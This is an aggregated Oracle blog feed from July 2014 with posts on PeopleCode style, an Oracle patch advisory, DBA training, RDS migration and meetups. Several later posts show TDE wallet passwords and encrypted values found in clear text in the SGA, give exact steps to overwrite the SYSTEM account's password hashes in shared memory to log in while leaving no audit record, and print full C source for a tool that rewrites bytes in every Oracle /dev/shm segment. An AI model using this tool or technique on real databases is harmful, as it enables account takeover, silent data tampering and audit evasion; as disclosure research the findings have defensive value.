Feed aggregator

PeopleCode Coding Discipline

Jim Marion - Wed, 2014-07-16 12:23

Java, JavaScript, C++, C Sharp, Objective C, Groovy... what do these languages have in common? Yes, curly braces, but besides that... actually, there are a lot of similarities between these languages. Throw Visual Basic, Perl, Python, or any other well-known language into the mix and the number of similarities drops significantly. Setting semantics and syntax aside, a common attribute of all well-known languages is standards and best practices. Some of those best practices (such as coding style) differ by language. For example, bash scripts can either look like, uh... bash scripts or they can look like c-style logic statements. Obviously, bash best practices prefer you make bash code look like bash code. Other standards are personal: do you prefer real tabs or spaces? How many spaces does your tab consume? Do you put curly braces on a new line?

How does all of this fit into PeopleCode? Forget about code formatting preferences. Application Designer has its own code formatting ideas. But there are other best practices that can help you write better code with fewer defects (fewer defects = better code). By following best practices your code will be easier to read, you will be more productive, and your users will be happier because you deliver better solutions faster.

Even though best practices usually result in code that is more efficient to process, that isn't really the point. Computers can interpret just about anything. Compilers and interpreters are really good at eliminating useless words and resolving seemingly incomprehensible logic. I love Martin Fowler's quote, "Any fool can write code that a computer can understand. Good programmers write code that humans can understand." Best practices are really about writing code that humans can easily comprehend. For example, avoid complex logic (including double negatives, or any negative logic, for that matter), keep your method and function code short, etc. If you write some code, leave it for a night, and then come back the next day and either need to read lots of comments to figure it out or spend a few minutes "remembering" what that code does, then the code is probably too complex. The problem with complex code is that it is easily misinterpreted by humans. Another problem with complex code is we actually ignore it when trying to resolve problems. We know it takes time to digest complex code, so we avoid it, preferring to test simple code first. Why waste time trying to understand complex code if it might be functioning properly?

Today's Quest Newsletter contained a link to 10 Bad Coding Practices That Wreck Software Development Projects. These are language agnostic practices that we can easily apply to PeopleSoft development.

If I were to summarize Coding best practices, I think I would do it like this: two.sentenc.es. Now, arguably, short does not equal comprehensible. There are programmers that err on the terse side because it is clever. This is true, often short code is clever. It is also hard to read. Most of us, however, err the other way. E. F. Schumacher said, "Any fool can make things bigger, more complex, and more violent. It takes a touch of genius — and a lot of courage — to move in the opposite direction." Schumacher died in 1977, so this problem is not new.

Computer programming is about communication. As programmers we have two audiences:

  • Computers (which can interpret anything -- even complex stuff)
  • Humans (who have a limited attention span, distractions, and a preference for simplicity)

Here is why I think discipline and best practices are critical for good PeopleCode:

We use PeopleCode to create business rules, but PeopleCode is NOT a business rules language. PeopleCode is a Metadata manipulation language. (Note: this is purely my opinion)

Here is why I believe PeopleCode is for metadata, not business rules: PeopleCode only has Metadata objects: records, fields, SQL, components, menus, etc. These are all metadata. These are the low level API's we use to write business logic. Consider the following PeopleCode:

Local record &rec = CreateRecord(Record.PSOPRDEFN);
Local field &descr;

&rec.SelectByKey("jimsoprid");
&descr = &rec.GetField(Field.OPRDEFNDESC);

&descr.Value = "Jim Marion";

&rec.Update();

This code implements business logic, but does so by manipulating metadata objects. PeopleCode metadata objects are building blocks for business logic. If we were to rewrite this using a business logic language, it would probably look something like this:

Local User &u = GetUser("jimsoprid");

&u.descr = "Jim Marion";
&u.Update();

And this is why discipline and best practices are SO important for PeopleCode developers: We are trying to speak business logic with a metadata vocabulary. We start with a communication deficit. It is like trying to teach advanced weaving using an automobile mechanics vocabulary. The two subjects have different vocabularies. But if you combine the words correctly, you can communicate the same meaning.

Oracle Critical Patch Update Advisory – July 2014

VitalSoftTech - Tue, 2014-07-15 20:45
The July Oracle Critical Patch has been released. This includes patches for Database Product Suite, Fusion Middleware Product Suite, Exalogic, and Enterprise Manager Suite Critical Patch Updates and Patch Set Updates. It includes 113 new security , 5 Oracle Database and a host of other bug fixes. More about the July 2014 Critical Patch Update […]
Categories: DBA Blogs

July 2014 Critical Patch Update Released

Oracle Security Team - Tue, 2014-07-15 14:41
Normal 0 false false false EN-US X-NONE X-NONE

Hello, this is Eric Maurice.

Oracle today released the July 2014 Critical Patch Update. This Critical Patch Update provides 113 new security fixes across a wide range of product families including: Oracle Database, Oracle Fusion Middleware, Oracle Hyperion, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite, Oracle PeopleSoft Enterprise, Oracle Siebel CRM, Oracle Industry Applications, Oracle Java SE, Oracle Linux and Virtualization, Oracle MySQL, and Oracle and Sun Systems Products Suite.

This Critical Patch Update provides 20 additional security fixes for Java SE. The highest CVSS Base Score for the Java vulnerabilities fixed in this Critical Patch Update is 10.0. This score affects a single Java SE client vulnerability (CVE-2014-4227). 7 other Java SE client vulnerabilities receive a CVSS Base Score of 9.3 (denoting that a complete compromise of the targeted client is possible, but that that access complexity to exploit these vulnerabilities is “medium.”) All in all, this Critical Patch Update provides fixes for 17 Java SE client vulnerabilities, 1 for a JSSE vulnerability affecting client and server, and 2 vulnerabilities affecting Java client and server. Oracle recommends that home users visit http://java.com/en/download/installed.jsp to ensure that they run the most recent version of Java. Oracle also recommends Windows XP users to upgrade to a currently-supported operating system. Running unsupported operating systems, particularly one as prevalent as Windows XP, create a very significant risk to users of these systems as vulnerabilities are widely known, exploit kits routinely available, and security patches no longer provided by the OS provider.

This Critical Patch Update also includes 5 fixes for the Oracle Database. The highest CVSS Base Score for these database vulnerabilities is 9.0 (this score affects vulnerability CVE-2013-3751)).

Oracle Fusion Middleware receives 29 new security fixes with this Critical Patch Update. The most severe CVSS Base Score for these vulnerabilities is 7.5.

Oracle E-Business Suite receives 5 new security fixes with this Critical Patch Update. The most severe CVSS Base Score reported for these vulnerabilities is 6.8.

Oracle Sun Systems Products Suite receive 3 new security fixes with this Critical Patch Update and one additional Oracle Enterprise Manager Grid Control fix is applicable to these deployments. Fixes that exist because of the dependency between individual Oracle product components are listed in italics in the Critical Patch Update Advisory. These bugs are listed in the risk matrices of the products they initially exist in, as well as in the risk matrices of the products they are used with. The most severe CVSS Base Score for these Oracle Sun Systems Products Suite vulnerabilities is 6.9.

As a reminder, Critical Patch Update fixes are intended to address significant security vulnerabilities in Oracle products and also include code fixes that are prerequisites for the security fixes. As a result, Oracle recommends that this Critical Patch Update be applied as soon as possible by customers using the affected products.

For More Information:

The July 2014 Critical Patch Update Advisory is located at http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

The Oracle Software Security Assurance web site is located at http://www.oracle.com/us/support/assurance.

Java home users can detect if they are running obsolete versions of Java SE and install the most recent version of Java by visiting http://java.com/en/download/installed.jsp

/* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;}

Oracle DBA Training Options Are Changing

This page has been permanently moved. Please CLICK HERE to be redirected.

Thanks, Craig.Oracle DBA Training Options Are Changing
Training options for Oracle Database DBAs are changing. Generally, I don't think they are for the better. Companies don't value Oracle Database Administrators like they used to. And, it shows in the lack of their professional development investment.

When I travel a long way from home, I tend to get very reflective about life, death and beyond. On my way home from teaching an onsite two-day Oracle performance tuning seminar coupled with a one-day predictive analysis (forecasting) class in Ghana (yes, Ghana as in AFRICA) I started thinking about how fortunate the Ghana DBAs I taught are. Clearly their management is willing to invest in their DBAs' future. This is very, very rare.

Today most Oracle DBAs receive what I call, "Training By Google." You know, blog posts, YouTube videos and various syntax websites. While these are all valuable (I am a content creator myself with my blog posts and videos), they are no substitute for instructor led training. Not even close! So what is happening that is forcing Oracle DBAs to change their training habits?

So Why The Change? Three Reasons
1. Training Budget. Over the past five years I have been disappointed (more like disturbed) that most companies do not provide the training DBAs need. They just won't do it. IT managers (not typically DBA managers) believe their staff can get by with "Training By Google." It's stupid and foolish. It tells DBAs they are worthless and leaves them unprepared to perform at their best. And, of course, that ends up hurting the company they work for. Stupid and foolish.

Are we then surprised with the results from poor performing systems, down production systems, massive security breaches, and DBAs hopping from one company to another?

2. Travel Budget. A nasty tactic many companies use is to provide a minimal training budget but without a travel budget. If you want specialized and advanced training, you'll probably have to travel to get to it. Maybe not hundreds or thousands of miles, but probably more than you want to commute each day.

Essentially the company is splitting the training cost with the DBA and ensuring the DBA really, really wants the training. OK, I can respect that. But, I think a company that does not truly provide training for its employees (human beings that spend a significant portion of their lives doing whatever it takes to get the job done) is cruel and frankly immoral.

3. More Training Options. The good news for Oracle DBAs is there is more information and training options available today than ever before. When the orapub.com website began in 1995, doing a "tail -f" on the web log was a lesson in world geography. It was amazing watching line after line stream by as DBAs from all over the world were looking for Oracle performance materials through the web. Now there is much more available. Training options for Oracle DBAs now include traditional instructor led training (ILT), web sites from content aggregators (people who pull together content for us), content creators (like myself), and online training. I'm very excited about online training and have made a significant investment in OraPub's Online Institute.

Summary
So there you have it. Because of economics, the devaluation of DBAs as human beings and the increase in training options, the Oracle DBA training landscape is changing. If you believe this, the next question is, "What is good content?" That will be the subject of my next posting!

Enjoy your work and thanks for reading!

Craig.
.
Categories: DBA Blogs

MySQL on-premise to Amazon RDS migration tips

Kubilay Çilkara - Mon, 2014-07-14 14:27
Things to watch and do when migrating MySQL databases from ‘on-premise’ to Amazon AWS RDS


  • Not all versions of databases can be migrated to RDS. Especially if you want to do a 0 downtime migration. Make sure you know which versions are possible, at this writing Amazon announced that it  will support any old version of MySQL 5.1 and above.
  • In a zero downtime migration to Amazon RDS you work with mysqldump or mydumper to  import the baseline data and and then you use MySQL Replication and the binary_log  position to apply the additional records created during the import, the delta.  That is it is possible to create a MySQL slave in the Amazon AWS Clouds!
  • So when you have confirmed the on-premise MySQL that you have is  compatible you can then use mysqldump with the --master-data parameter to export your data including the binlog  position coordinates at the time of  the export. You can use mydumper if yor database is big to do this with parallel streams. You will use the coordinates and MySQL replication to catch-up with the on-premise master database when creating the MySQL slave in RDS.
  • Use different database parameters for different databases.
  • As  you load the RDS database using myloader or  mysql the operation might take long time depending on the size of your database. If this is the case, disable backups, it stops logging, try using one  of the better spec RDS Instance classes and IOPS for the duration of the operation. You can always downsize the RDS instance after you have  completed the initial load.
  • After you have completed the initial load, use Multi AZ which is a synchronous standby (in Oracle parlour) and schedule the backups immediately before you open your applications to the database, as initial backup requires a reboot.
  • Beware there is no SSH access to RDS, that means you have no access to the file system.
  • Get the DB Secuirty groups right and make sure your applications can access the RDS instances
Categories: DBA Blogs

Take a Walk

Scott Spendolini - Mon, 2014-07-14 11:24
Steven Feuerstein (https://twitter.com/stevefeuerstein) just tweeted this:

Improve your programming with a daily regimen of situps (or anything you can do to strengthen abs), walks in the woods, and lots of water.
— Steven Feuerstein (@stevefeuerstein) July 14, 2014 Which in turn, inspired me to quickly write this post.

The combination of being in IT and working from home leads to lots of hours logged in some sort of chair, whether its in my home office, at a customer site or a coffee shop.  You don't need to be a doctor to realize that this is not particularly healthy behavior.

So for the past few months, I've incorporated something new into my daily routine: taking a walk.  It doesn't sound like much, and quite honestly, it really isn't.  But, I wish that I had started this years ago, because the benefits of it are huge.

First of all, it's nice to get outside during the day, especially when it's actually nice out.  Nothing can quite compare to it, no matter how many pixels they squeeze into a tablet.  Sometimes I just walk at a leisurely pace, other times I run.  I'm not training for any specific race, nor do I feel compelled to share my statistics over social media.  I just do what I want when I can.

Second of all, it gives me some time to either listen to a podcast, music or to just think.  I've really grown to like the podcasts that the folks at TWiT (http://www.twit.tv) produce, with This Week in Tech being one of my favorites.  Listening to something that interests you makes the time go by so much quicker, that you may even be tempted to extend your distance to accommodate the extra content.

In fact, listening to them really puts me in a creative and inspired mood, which helps explain the third benefit: background processing.  I don't know much about neuroscience, but I do know a little bit how my brain works.  If I'm struggling with a difficult problem, I've learned over time that the best thing that I can do is to literally walk away from it.  Going on a walk or run or even a drive allows my brain to "background process" that problem while I focus on other things.  The "A-Ha!" moment that I have is my brain's way of alerting me once the problem has been solved.   Corny, I know, but that's how it works for me.

And lastly - and probably most importantly - I've been able to drop a few pounds because of my walks (combined with better eating habits).  I do use RunKeeper to log my walks and track my weight, because numbers simply don't lie.  It also serves as a source of inspiration if I can beat a personal record or cross a weight milestone.

Big Data doom mongers need to look outside of the marketing department

Steve Jones - Mon, 2014-07-14 10:10
In every change there are hype machines that over play and sages who call doom.  Into the Big Data arena steps David Searls to proclaim that Big Data is a myth and simply hype which is set to burst in an article over at ZDNet. But big data, he said, is nothing more than the myth that collecting vast amounts of data can help companies know customers better than those customers even know
Categories: Fusion Middleware

Next ORCLAPEX NOVA Meetup: July 17th

Scott Spendolini - Mon, 2014-07-14 07:37
The next Meetup for the ORCLAPEX NOVA Meetup Group will be this Thursday, July 17th at 7:00PM at Oracle Reston.  (Details: http://www.meetup.com/orclapex-NOVA/events/192592582/)

We're going to try the "Open Mic" format that has been wildly successful at KScope for the past few years.  The rules are quite simple: anyone can demonstrate their APEX-based solution for up to 10 minutes.  No need to reserve a spot or spend too much time planning.  And as always, no slides will be permitted - strictly demo.

Anyone and everyone is welcome to present - even if you have never presented before.  We're a welcoming group, so please don't be shy nor feel intimidated!  I've actually seen quite an amazing selection of APEX-based solutions at prior open mic nights from people who have never presented before, so I encourage everyone to give it a try.

While there is WiFi available at Oracle, it's always best to have a local copy of your demonstration, just in case you can't connect or the network is having issues.

See you Thursday night!

Oracle encrypted table data found unencrypted in SGA

ContractOracle - Sun, 2014-07-13 22:29
When data needs to be kept private, or companies are worried about data leakage, then they often choose to store that data in encrypted columns in the table using Oracle Transparent Data Encryption. 

I wanted to see if that data was stored in the SGA in an unencrypted format.  I ran the following test from sqlplus.

CDB$ROOT@ORCL> create table credit_card_number(card_number char(16) encrypt);

Table created.

CDB$ROOT@ORCL> insert into credit_card_number values ('4321432143214321');

1 row created.

CDB$ROOT@ORCL> update credit_card_number set card_number = '5432543254325432' where card_number = '4321432143214321';

1 row updated.

CDB$ROOT@ORCL> VARIABLE cardnumber char(16);
CDB$ROOT@ORCL> EXEC :cardnumber := '6543654365436543';

PL/SQL procedure successfully completed.

CDB$ROOT@ORCL> update credit_card_number set card_number = :cardnumber where card_number = '5432543254325432';

1 row updated.

CDB$ROOT@ORCL> commit;

Now we search SGA for the data that should be encrypted to keep it private.  


[oracle@localhost shared_memory]$ ./sga_search 4321432143214321
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 459100
4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 3244704
4321432143214321
/dev/shm/ora_orcl_38895617_29 found string at 2529984
4321432143214321
[oracle@localhost shared_memory]$ ./sga_search 5432543254325432
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 459061
5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 4106466
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2075064
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2528552
5432543254325432
/dev/shm/ora_orcl_38895617_28 found string at 1549533
5432543254325432
[oracle@localhost shared_memory]$ ./sga_search 6543654365436543
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 6543654365436543
/dev/shm/ora_orcl_38895617_29 found string at 3801400
6543654365436543

The output shows that all 3 of the card_number values used in the demonstration can be found in SGA, sometimes in multiple locations.  Flushing the buffer cache did not clear the data from SGA, but flushing the shared pool did.  Further analysis is needed to confirm exactly where in the shared pool the unencrypted data is being stored to confirm if it is in sql statements, sql variables, or interim values kept by the encryption process.  Further testing is also needed to see if it is possible to avoid potential data leakage by using bind variables or wrapping sql in plsql.  In the meantime ... be aware that data you believe to be encrypted may actually be stored in memory in clear text visible to anyone with privileges to connect to the SGA.

Oracle TDE FAQ  :- http://www.oracle.com/technetwork/database/security/tde-faq-093689.html
States that "With TDE column encryption, encrypted data remains encrypted inside the SGA, but with TDE tablespace encryption, data is already decrypted in the SGA, which provides 100% transparency."
Categories: DBA Blogs

Oracle encryption wallet password found in SGA

ContractOracle - Sun, 2014-07-13 21:51
If companies are worried about data privacy or leakage, they are often recommended to encrypt sensitive data inside Oracle databases to stop DBAs from accessing it, and implement "separation of duties" so that only the application or data owner has the encryption keys or wallet password.  One method to encrypt data is to use Oracle Transparent Database Encryption which stores keys in the Oracle wallet protected by a wallet password.  Best practice dictates using a very long wallet password to avoid rainbow tables and brute force attacks, and keep the key and password secret.

I wrote a simple program to search for data in Oracle shared memory segments, and it was able to find the Oracle wallet password, which means anyone who can connect to the shared memory can get the wallet password and access the encrypted data.  The following demonstrates this :-

First open and close the wallet using the password :-


CDB$ROOT@ORCL> alter system set encryption wallet open identified by "verylongverysecretwalletpassword1";

System altered.

CDB$ROOT@ORCL> alter system set wallet close identified by "verylongverysecretwalletpassword1";

System altered.


Now search for the wallet password in SGA :-

oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1

The search found the password in SGA, so it should be possible to analyse the memory structure that currently stores the known password, and create another program to directly extract passwords on unknown systems.  It may also be possible to find the password by selecting from v$ or x$ tables.  I have not done that analysis, so don't know how difficult it would be, but if the password is stored, it will be possible to extract it, and even if it is mixed up with a lot of other sql text and variables it would be very simple to just try opening the wallet using every string stored in SGA.

The password is still in SGA after flushing the buffer cache.

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1


After flushing the shared pool the password is no longer available.  

CDB$ROOT@ORCL> alter system flush shared_pool;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
[oracle@localhost shared_memory]$ 

As this password really should be secret, Oracle really should not store it.   More research is needed to confirm if the password can be hidden by using bind variables, obfuscation, or wrapping it in plsql.
Categories: DBA Blogs

ASM Startup Fails With ORA-04031 After Adding CPUs

Don Seiler - Sun, 2014-07-13 15:11
A few weeks ago we upgraded one of our production server, adding another CPU tray. This brought the number of CPU cores from 80 to 160, and took us from 2Tb of RAM to 4Tb (just in time for Oracle to announce the in-memory database in 12.1.0.2!).

However when I went to start things up, ASM wasn't starting up, giving me these errors:

ORA-04031: unable to allocate 32 bytes of shared memory ("shared pool","unknown object","KKSSP^550","kglseshtSegs")
ORA-04031: unable to allocate 392 bytes of shared memory ("shared pool","unknown object","sga heap(1,1)","kdlwss")

ORA-04031: unable to allocate 560 bytes of shared memory ("shared pool","unknown object","sga heap(1,1)","KKSSP")
RBAL (ospid: 59427): terminating the instance due to error 4031




A quick search of MOS turned up this gem:

Unable To Start ASM (ORA-00838 ORA-04031) On 11.2.0.3/11.2.0.4 If OS CPUs # > 64. (Doc ID 1416083.1), with this cause:
In 11.2.0.3/11.2.0.4, the "PROCESSES" parameter will be default to "available CPU cores * 80 + 40" (in the ASM spfile). As the default value for "MEMORY_TARGET" is based on "PROCESSES", it can be insufficient if there is a large number of CPU cores or large number of diskgroups which could cause issues (i.e. Grid Infrastructure stack fails to stop with ORA-04031 etc) per Bug:13605735 & Bug:12885278, it is recommended to increase the value of MEMORY_MAX_TARGET & MEMORY_TARGET before upgrading/installing to 11.2.0.3/11.2.0.4 (does not apply to 10g ASM).
We followed the workaround of increasing the ASM memory_target (and memory_max_size) to 4Gb (from 500Mb) and things started up just fine.

We've since actually increased the memory even more in ASM to see even better performance but I haven't taken the time yet to precisely understand where that is coming from. I'll be sure to write another post to detail that.

For now we're definitely enjoying the bigger shared pool and buffer caches in 11.2. We're definitely excited to dig into the in-memory options in the upcoming 12.1.0.2.
Categories: DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 18:12
The dates, and the speakers, for the Latin America Tour have been anounnced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 04:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, and the database did not crash, or detect the data change, and allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back-out the changes made to SGA to the original hash values to cover up completely.

Sample output from the first SGA update command above follows :-

[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 03:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include stdio.h
#include stdlib.h
#include ctype.h
#include dirent.h
#include string.h
#include unistd.h
#include sys/file.h
#include sys/mman.h

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 03:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

